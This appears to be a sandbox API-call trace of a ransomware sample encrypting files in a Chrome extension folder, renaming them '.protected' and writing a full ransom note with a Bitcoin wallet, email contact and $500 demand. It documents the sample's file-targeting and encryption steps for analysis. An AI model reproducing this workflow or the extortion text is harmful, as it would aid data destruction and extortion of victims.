[0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="Windows") returned -1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="Program Files") returned 1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="Program Files (x86)") returned 1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="$Recycle.bin") returned 1 [0080.896] lstrcmpiW (lpString1="topbar_floating_button_pressed.png", lpString2="System Volume Information") returned 1 [0080.897] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrIW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".protected") returned 0x0 [0080.897] lstrcmpW (lpString1="topbar_floating_button_pressed.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.897] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.897] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".txt") returned 0x0 [0080.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".rar") returned 0x0 [0080.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".zip") returned 0x0 [0080.897] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.898] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.898] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.898] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.899] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.899] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.899] CloseHandle (hObject=0x164) returned 1 [0080.899] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.protected") returned 185 [0080.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.protected")) returned 1 [0080.900] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.900] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.900] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\RESTORE_FILES.txt") returned 158 [0080.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.900] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.900] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.901] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.901] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.901] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.901] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.901] CloseHandle (hObject=0x160) returned 1 [0080.902] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0080.902] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0080.902] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.902] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.902] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0080.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0080.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0080.902] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x52a, lpOverlapped=0x0) returned 1 [0080.904] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffad6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.904] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x52a, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x52a, lpOverlapped=0x0) returned 1 [0080.904] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.904] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.904] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.905] CloseHandle (hObject=0x160) returned 1 [0080.905] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.protected") returned 157 [0080.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.protected")) returned 1 [0080.905] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.905] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0080.905] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0080.906] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0080.906] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0080.906] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0080.906] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales") returned 142 [0080.906] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0080.906] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0080.906] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*") returned 144 [0080.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.914] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.914] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.914] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.914] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.915] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\.") returned 144 [0080.915] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.915] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.915] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\..") returned 145 [0080.915] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.915] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.915] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0080.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg") returned 145 [0080.915] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0080.915] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0080.915] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*") returned 147 [0080.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\.") returned 147 [0080.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\..") returned 148 [0080.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.916] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.916] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.916] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.916] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.918] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.918] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.918] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.918] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x376, lpOverlapped=0x0) returned 1 [0080.925] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffc8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.926] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x376, lpOverlapped=0x0) returned 1 [0080.926] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.926] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.926] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.926] CloseHandle (hObject=0x168) returned 1 [0080.926] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.protected") returned 169 [0080.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 